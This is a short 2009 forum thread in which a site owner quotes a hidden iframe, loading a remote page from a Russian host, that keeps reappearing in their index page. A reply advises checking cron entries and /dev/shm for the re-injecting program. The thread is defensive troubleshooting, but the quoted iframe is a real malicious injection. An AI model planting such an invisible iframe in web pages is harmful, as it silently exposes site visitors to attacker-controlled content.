Results 1 to 2 of 2
Thread: code injection
Jul 13, 2009, 11:10 #1
some how following code gets inject to my index page. what should I do to stop it?
<iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>
Jul 13, 2009, 11:21 #2
Ask your admin to check cron entries. Usually a virus-like program creates a cron entry to check every 'n' minutes or hours and if it notices that you have removed that iframe from your page it will add it again. The contents (html to add) are usually hidden is some writable directory, often on the /dev/shm partition - the place where you would not expect to have any files or programs, but since /dev/shm is (must be) writable, a virus often uses it to store contents.
But your first step should be to examine all cron entries. look in /etc/cron.daily and in /etc/cron.d